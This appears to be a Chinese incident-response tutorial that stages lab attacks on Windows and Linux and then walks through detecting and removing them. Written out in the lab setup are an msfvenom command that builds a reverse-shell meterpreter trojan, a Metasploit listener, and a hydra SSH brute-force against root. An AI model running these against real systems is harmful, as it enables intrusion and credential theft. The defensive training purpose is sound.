目录
应急响应
介绍:
应急流程:
抑制阶段:
抑制阶段主要针对检测阶段发现的攻击特征采取有针对性的安全补救工作,以防止攻击进一步加深和扩大。具体措施包括:
对于Linux,一些常见的排查命令:
对于Windows,常见的排查命令:
接下来是关于Windows和Linux的简单实战排查
Windows应急(一)
环境准备:
Linux先生成木马:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.130 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/muma.exe
开启Apache服务,使Windows能够访问下载
systemctl start apache2
打开Windows,下载恶意木马
注意关闭防火墙
打开Linux的监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.11.130
set lport 9999
点击Windows下载的木马使他上线
成功上线:
排查思路:
1.先查看是否有异常的连接
netstat -ano
这里可以直接看到异常的连接
2.发现异常查看一下PID是7684,那么直接打开任务管理器找到这个进程,直接杀掉
杀掉以后,看一下我们的攻击机器
果然,连接断开
3.除此之外,我们还可以查看一下计划任务,查看一下是否有异常
Windows应急(二)
环境准备:
开启靶机的3389端口
攻击机远程桌面并且连接,创建一个新的用户
排查:
1.查看是否有异常用户
net user
2.这里可能有隐藏账户,打开注册表看一下
这里可以看到隐藏账户
计算机管理也可以看用户信息
3.查看一下日志,登录信息
4.查看服务信息,是否有异常
Linux应急
环境准备:
确定目标服务器
使用hydra进行爆破密码
hydra -s 22 -v -l root -P 字典 地址 ssh
这里爆破成功,直接登录,因为kali出了点问题,这里我有centos7登录
登录成功
创建一个新账户
这里创建的普通用户,可以留一个提取后门,下次以普通用户登录进去,直接提权到root权限,
这里还可以进行反弹shell,计划任务、服务等等操作
因为这里只是演示,不再操作
排查:
1.先查看CPU占有率
top
有的时候会有挖矿木马占用的CPU较高
2.查看开机启动服务:
systemctl list-unit-files
查看一下是否有异常
3.查看定时任务:
crontab -l
4.查看日志,看有哪些登录信息
cd /var/log
last
这里就可以看到异常登录
5.查看账户信息
cat /etc/passwd
发现了刚才创建的用户,直接删除
6.我们还可以查看passwd的MD5值是否变化来排查是否异常
cd /etc
md5sum passwd
这里可以写一个监控MD5的脚本,当MD5值变化时,就会及时告警